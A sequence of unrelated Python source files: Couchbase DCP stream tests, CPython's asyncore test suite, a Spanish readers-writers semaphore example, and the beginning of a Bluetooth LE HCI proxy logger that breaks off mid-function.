for i in xrange(1000):
self.mcd_client.set('key%s' % i, 0, 0, 'value', 0)
stream.run()
assert stream.last_by_seqno == 1000
self.verification_seqno = 1000
dcp_client2.close()
def test_stream_request_cas(self):
n = 5
response = self.dcp_client.open_producer("producer")
for i in xrange(n):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
for i in range(n):
key = 'key' + str(i)
rv, cas, _ = self.mcd_client.get(key, 0)
assert rv == SUCCESS
self.mcd_client.cas(key, 0, 0, cas, 'new-value', 0)
self.sleep(2)
stream = self.dcp_client.stream_req(0, 0, 0, n, 0)
responses = stream.run()
mutations = \
filter(lambda r: r['opcode'] == CMD_MUTATION, responses)
assert len(mutations) == n
assert stream.last_by_seqno == 2 * n
self.verification_seqno = 2 * n
for doc in mutations:
assert doc['value'] == 'new-value'
def test_get_all_seq_no(self):
res = self.mcd_client.get_vbucket_all_vbucket_seqnos()
for i in range(1024):
bucket, seqno = struct.unpack(">HQ", res[2][i * 10:(i + 1) * 10])
assert bucket == i
# Check the scenario where time is not synced but we still request extended metadata. There should be no
# adjusted time but the mutations should appear. This test currently fails - MB-13933
def test_request_extended_meta_data_when_vbucket_not_time_synced(self):
n = 5
response = self.dcp_client.open_producer("producer")
response = self.dcp_client.general_control('enable_ext_metadata', 'true')
assert response['status'] == SUCCESS
for i in xrange(n):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, n, 0)
responses = stream.run()
assert stream.last_by_seqno == n, \
'Sequence number mismatch. Expect {0}, actual {1}'.format(n, stream.last_by_seqno)
""" Tests the for the presence of the adjusted time and conflict resolution mode fields in the mutation and delete
commands.
"""
@unittest.skip("deferred from Watson")
def test_conflict_resolution_and_adjusted_time(self):
if self.remote_shell.info.type.lower() == 'windows':
return # currently not supported on Windows
n = 5
response = self.dcp_client.open_producer("producer")
response = self.dcp_client.general_control('enable_ext_metadata', 'true')
assert response['status'] == SUCCESS
# set time synchronization
self.mcd_client.set_time_drift_counter_state(0, 0, 1)
for i in xrange(n):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
stream = self.dcp_client.stream_req(0, 0, 0, n, 0)
responses = stream.run()
assert stream.last_by_seqno == n, \
'Sequence number mismatch. Expect {0}, actual {1}'.format(n, stream.last_by_seqno)
for i in responses:
if i['opcode'] == CMD_MUTATION:
assert i['nmeta'] > 0, 'nmeta is 0'
assert i['conflict_resolution_mode'] == 1, 'Conflict resolution mode not set'
assert i['adjusted_time'] > 0, 'Invalid adjusted time {0}'.format(i['adjusted_time'])
# This test will insert 100k items into a server,
# Sets up a stream request. While streaming, will force the
# server to crash. Reconnect stream and ensure that the
# number of mutations received is as expected.
def test_stream_req_with_server_crash(self):
doc_count = 100000
for i in range(doc_count):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.wait_for_persistence(self.mcd_client)
by_seqno_list = []
mutation_count = []
def setup_a_stream(start, end, vb_uuid, snap_start, snap_end, by_seqnos, mutations):
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
stream = self.dcp_client.stream_req(0, 0, start, end, vb_uuid,
snap_start, snap_end)
assert stream.status == SUCCESS
stream.run()
by_seqnos.append(stream.last_by_seqno)
mutations.append(stream.mutation_count)
def kill_memcached():
if self.remote_shell.info.type.lower()== 'windows':
self._execute_command('taskkill /F /T /IM memcached*')
else:
self._execute_command('killall -9 memcached')
response = self.mcd_client.stats('failovers')
vb_uuid = long(response['vb_0:0:id'])
start = 0
end = doc_count
proc1 = Thread(target=setup_a_stream,
args=(start, end, vb_uuid, start, start, by_seqno_list, mutation_count))
proc2 = Thread(target=kill_memcached,
args=())
proc1.start()
proc2.start()
self.sleep(2)
proc2.join()
proc1.join()
# wait for server to be up
self.wait_for_warmup(self.cluster.master.ip, self.cluster.master.port)
self.dcp_client = DcpClient(self.cluster.master.ip, self.cluster.master.port)
self.mcd_client = McdClient(self.cluster.master.ip, self.cluster.master.port)
response = self.mcd_client.stats('failovers')
vb_uuid = long(response['vb_0:0:id'])
assert len(by_seqno_list)
start = by_seqno_list[0]
end = doc_count
setup_a_stream(start, end, vb_uuid, start, start, by_seqno_list, mutation_count)
mutations_received_stage_one = mutation_count[0]
mutations_received_stage_two = mutation_count[1]
assert (mutations_received_stage_one + mutations_received_stage_two == doc_count)
def test_track_mem_usage_with_repetetive_stream_req(self):
doc_count = 100000
for i in range(doc_count):
self.mcd_client.set('key' + str(i), 0, 0, 'value', 0)
self.wait_for_persistence(self.mcd_client)
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
resp = self.mcd_client.stats()
memUsed_before = float(resp['mem_used'])
start = 0
end = doc_count
snap_start = snap_end = start
response = self.mcd_client.stats('failovers')
vb_uuid = long(response['vb_0:0:id'])
for i in range(0, 500):
stream = self.dcp_client.stream_req(0, 0, start, end, vb_uuid,
snap_start, snap_end)
assert stream.status == SUCCESS
self.dcp_client.close_stream(0)
self.sleep(5)
resp = self.mcd_client.stats()
memUsed_after = float(resp['mem_used'])
assert (memUsed_after < ((0.1 * memUsed_before) + memUsed_before))
""" Test for MB-11951 - streams which were opened and then closed without streaming any data caused problems
"""
def test_unused_streams(self):
initial_doc_count = 100
for i in range(initial_doc_count):
self.mcd_client.set('key1' + str(i), 0, 0, 'value', 0)
# open the connection
response = self.dcp_client.open_producer("mystream")
assert response['status'] == SUCCESS
# open the stream
stream = self.dcp_client.stream_req(0, 0, 0, 1000, 0)
# and without doing anything close it again
response = self.dcp_client.close_stream(0)
assert response['status'] == SUCCESS
# then do some streaming for real
doc_count = 100
for i in range(doc_count):
self.mcd_client.set('key2' + str(i), 0, 0, 'value', 0)
# open the stream
stream = self.dcp_client.stream_req(0, 0, 0, doc_count, 0)
stream.run(doc_count)
assert stream.last_by_seqno == doc_count, \
'Incorrect sequence number. Expect {0}, actual {1}'.format(doc_count, stream.last_by_seqno) |
test_asyncore.py | import asyncore
import unittest
import select
import os
import socket
import sys
import time
import errno
import struct
from test import support
from io import BytesIO
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
try:
import threading
except ImportError:
threading = None
TIMEOUT = 3
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen()
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
support.unlink(addr)
support.bind_unix_socket(sock, addr)
else:
sock.bind(addr)
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
with support.captured_stderr() as stderr:
d.log(l1)
d.log(l2)
lines = stderr.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
with support.captured_stdout() as stdout:
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
lines = stdout.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
with support.captured_stdout() as stdout:
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
lines = stdout.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event']
self.assertEqual(lines, expected)
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = support.bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((support.HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
t.join(timeout=TIMEOUT)
if t.is_alive():
self.fail("join() timed out")
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(support.TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
support.unlink(support.TESTFN)
def test_recv(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(support.TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
def test_resource_warning(self):
# Issue #11453
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
with support.check_warnings(('', ResourceWarning)):
f = None
support.gc_collect()
def test_close_twice(self):
fd = os.open(support.TESTFN, os.O_RDONLY)
f = asyncore.file_wrapper(fd)
os.close(fd)
os.close(f.fd) # file_wrapper dupped fd
with self.assertRaises(OSError):
f.close()
self.assertEqual(f.fd, -1)
# calling close twice should not fail
f.close()
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all(ignore_all=True)
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll:
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
self.assertEqual(s.socket.family, self.family)
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(s.socket.type,
(sock_type | socket.SOCK_CLOEXEC, sock_type))
else:
self.assertEqual(s.socket.type, sock_type)
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(OSError, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with socket.socket(self.family) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=5))
t.start()
try:
with socket.socket(self.family, socket.SOCK_STREAM) as s:
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except OSError:
pass
finally:
t.join(timeout=TIMEOUT)
if t.is_alive():
self.fail("join() timed out")
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (support.HOST, 0)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (support.HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = support.TESTFN
def tearDown(self):
support.unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
if __name__ == "__main__":
unittest.main()
|
lect_escr.py | from random import random
from time import sleep
import threading
lectores = 0
mutex = threading.Semaphore(1)
cuarto_vacio = threading.Semaphore(1)
torniquete = threading.Semaphore(1)
def escritor(id):
sleep(random())
print(" Escritor %d iniciando" % id)
torniquete.acquire()
print(" Escritor %d: En el torniquete" % id)
cuarto_vacio.acquire()
print(" Escritor %d: El cuarto es mío!" % id)
escribe(id)
cuarto_vacio.release()
torniquete.release()
print(" Escritor %d se fue" % id)
def lector(id):
sleep(random())
global lectores
print("Lector %d iniciando" % id)
torniquete.acquire()
torniquete.release()
mutex.acquire()
lectores = lectores + 1
print("%d: Ahora somos %d lectores" % (id, lectores))
if lectores == 1:
print("%d: El cuarto estaba vacío" % id)
cuarto_vacio.acquire()
mutex.release()
lee(id)
mutex.acquire()
lectores = lectores - 1
print("%d: Ya me voy, dejo %d lectores" % (id, lectores))
if lectores == 0:
cuarto_vacio.release()
print("%d: Dejo un cuarto vacío"% id)
mutex.release()
def lee(id):
print("El lector %d está leyendo..." % id)
sleep(0.3)
print("%d ya terminó de leer" % id)
def escribe(id):
print(" El escritor %d está escribiendo.." % id)
sleep(2)
print(" %d terminó de escribir" % id)
for escr in range(3):
threading.Thread(target = escritor, args = [escr]).start()
for lect in range(20):
threading.Thread(target = lector, args = [lect]).start()
|
ble_logger.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import atexit
import logging
import collections
import os
import pty
import select
import subprocess
from StringIO import StringIO
from io import SEEK_CUR
import json
import errno
from datetime import datetime, timedelta
import threading
from jumper_logging_agent.agent import \
Agent, DEFAULT_FLUSH_PRIORITY, DEFAULT_FLUSH_INTERVAL, DEFAULT_FLUSH_THRESHOLD, DEFAULT_EVENT_TYPE
from . import gatt_protocol
from .hci_channel_user_socket import create_bt_socket_hci_channel_user
from hci_protocol.hci_protocol import *
from .event_parser_middleware import EventParser, EventParserException
from . import __version__
JUMPER_DATA_CHARACTERISTIC_UUID = int('8ff456780a294a73ab8db16ce0f1a2df', 16)
JUMPER_TIME_CHARACTERISTIC_UUID = int('8ff456790a294a73ab8db16ce0f1a2df', 16)
DEFAULT_INPUT_FILENAME = '/var/run/jumper_ble_logger/events'
DataToSendToAgent = collections.namedtuple('DataToSendToAgent', 'mac_address payload boot_time')
class AgentEventsSender(object):
def __init__(self, filename=DEFAULT_INPUT_FILENAME, logger=None):
self._logger = logger or logging.getLogger(__name__)
self._filename = filename
self._fifo = self.open_fifo_readwrite(self._filename)
@staticmethod
def open_fifo_readwrite(filename):
if not os.path.exists(filename):
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
try:
os.mkfifo(filename)
except OSError as e:
if e.errno != errno.EEXIST:
raise
fd = os.open(filename, os.O_RDWR | os.O_NONBLOCK)
return os.fdopen(fd, 'wb')
def send_data(self, data):
event = json.dumps(data).encode() + b'\n'
self._logger.debug('Sending event to agent')
self._fifo.write(event)
self._fifo.flush()
self._logger.info('Event sent to agent: %s', repr(event))
class HciProxy(object):
def __init__(self, hci_device_number=0, logger=None, events_config=None):
self._logger = logger or logging.getLogger(__name__)
self._event_parser = EventParser(config=events_config, logger=self._logger)
self._agent_events_sender = AgentEventsSender(logger=self._logger)
self._hci_device_number = hci_device_number
try:
subprocess.check_call(['hciconfig', self.hci_device_name, 'down'])
except subprocess.CalledProcessError:
self._logger.error('Could not run hciconfig down command for HCI device')
raise
self._hci_socket = create_bt_socket_hci_channel_user(hci_device_number)
self._logger.info('bind to %s complete', self.hci_device_name)
self._pty_master, pty_slave = pty.openpty()
self._pty_fd = os.fdopen(self._pty_master, 'rwb')
hci_tty = os.ttyname(pty_slave)
self._logger.debug('TTY slave for the virtual HCI: %s', hci_tty)
try:
subprocess.check_call(['hciattach', hci_tty, 'any'])
except subprocess.CalledProcessError:
self._logger.error('Could not run hciattach on PTY device')
raise
self._inputs = [self._pty_fd, self._hci_socket]
self._pty_buffer = StringIO() # Used as a seekable stream
self._gatt_logger = GattLogger(self._logger)
self._should_stop = False
@property
def hci_device_name(self):
return 'hci{}'.format(self._hci_device_number)
def handle_packet(self, packet, source):
action = self._gatt_logger.handle_message(packet, source)
self._logger.debug('Action: %s', action)
for packet in action.packets_to_send_to_socket:
self._logger.debug(
'Sending to socket: %s',
RawCopy(HciPacket).parse(packet)
)
self._hci_socket.sendall(packet)
if source == 'socket' and len(action.packets_to_send_to_pty) == 0:
self._logger.debug('Skipping PTY')
for packet in action.packets_to_send_to_pty:
self._logger.debug(
'Sending to PTY: %s',
RawCopy(HciPacket).parse(packet)
)
os.write(self._pty_master, packet)
if action.data_to_send_to_agent is not None:
try:
parsed_data = self._event_parser.parse(
action.data_to_send_to_agent.mac_address,
action.data_to_send_to_agent.payload,
action.data_to_send_to_agent.boot_time
)
except EventParserException as e:
self._logger.warning('Error parsing packet from BLE device: %s', e)
else:
self._agent_events_sender.send_data(parsed_data)
def run(self):
try:
while not self._should_stop:
readable, _, _ = select.select(self._inputs, [], [], 1)
if self._hci_socket in readable:
source = 'socket'
packet = self._hci_socket.recv(4096)
